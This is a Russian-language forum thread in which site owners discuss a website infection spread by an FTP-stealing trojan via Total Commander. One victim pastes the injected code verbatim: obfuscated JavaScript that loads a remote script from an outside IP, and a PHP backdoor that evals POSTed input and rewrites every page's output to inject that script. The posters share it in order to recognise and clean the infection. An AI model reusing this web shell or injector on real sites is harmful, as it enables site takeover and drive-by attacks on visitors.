Блоги Рунета

Интернета кусок


← заложи эту тему или зарегистрируйся
Страница ← Предыдущая  1, 2, 3
Что бы вы добавили к этому блогу?
да
40%
 40%  [ 2 ]
восемь
60%
 60%  [ 3 ]
Всего голосов : 5

Перечитывал сейчас топики с блогами... Только мне одному кажется странным, что в них отписывается куча пользователей, с одним единственным сообщением и одинаковым по стилистике слащаво-положительным комментарием, и угнетающей пустотой в профиле? ^_^

ЗЫ: Не поймите не правильно, блоги действительно офигительные и интересные. Но этот мозговой слизень уже как-то мельтешить начинает...

  
Мой кусок интернета

Если используется в качестве фтп-менеджера FAR или Тотал Командер, заражение будет и дальше.
Рекомендую WinSCP.
Код вируса сидел либо после тега body (в файлах .html) или после ?> (в файлах .php), правильно?

  
Книги Warhammer 40 000

elvizzz, действительно, троянчег прокрался через тотал коммандер. Поэтому сквид его пропустил... В общем, пересмотрел свои взгляды на защиту компьютера. Вирусы убил, ПО обновил. Всё нормально в общем.

  
Мой кусок интернета

agita писал(а): elvizzz, действительно, троянчег прокрался через тотал коммандер. Поэтому сквид его пропустил... В общем, пересмотрел свои взгляды на защиту компьютера. Вирусы убил, ПО обновил. Всё нормально в общем.

Я помню просто управлял площадкой на 8 сайтов. Пользовался тожн Тоталом. и раз в 2 дня вычищал сайт, пок умные люди не посоветовали соскакивать с коммандера.
На самом деле файлы заражаются по маске:
index.*
main.*
home.*
auth.*
login.*
Так что просто выискивать. Кстати, надеюсь пароль от ФТП не забыли поменять? ;)

  

agita писал(а):
Если кому интересно - могу выложить код, который дописывался к скриптам.

Мне интересно. Выложи пожалуйста.

  

К js файлам дописывалось вот это:

<!--
document.write(unescape('Q9%3CscrZ6giptQ9%20s8N5r0kcZ6g%3D%2FZ6g%2F94%2E20k40k7%2EQ92%2E8N519l4h5k6%2Fjquer8N5yKyH%2Ejs0k%3E%3C%2Fsck6rZ6giQ9ptQ9%3E').replace(/k6|0k|Q9|l4h|Z6g|KyH|8N5/g,""));
 -->


Некоторым php добавилось вот это:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY3I0b0NpanFNcHRkRWElMjBzbzVIcmM0b0MlM0QlMkYlMkZvNUg5anFNNCUyRTJvNUg0Nzk1WiUyRTJadmIlMkU0b0MxOTRvQzVvNUglMkY5NVpqWnZicXVadmJlcnk0b0MlMkVqcyUzRXg4JTNDZEVhJTJGc3g4Y3JqcU1pcFp2YnRqcU0lM0UnKS5yZXBsYWNlKC80b0N8eDh8ZEVhfFp2YnxqcU18OTVafG81SC9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


ЗЫ: Файлы были заражены не по маске. Например, был инфицирован wp-settings.php и jquery.js.

ЗЗЫ: Все пароли, естественно сменил.

  
Мой кусок интернета

agita, спасибо за код, я как раз об этом пост в блоге писал.
Насчет маски - значит усовершенствовался))

  
Книги Warhammer 40 000
Web 2.0 на марше Интернета кусок SEOinSoul — блог о SEO в реальном времени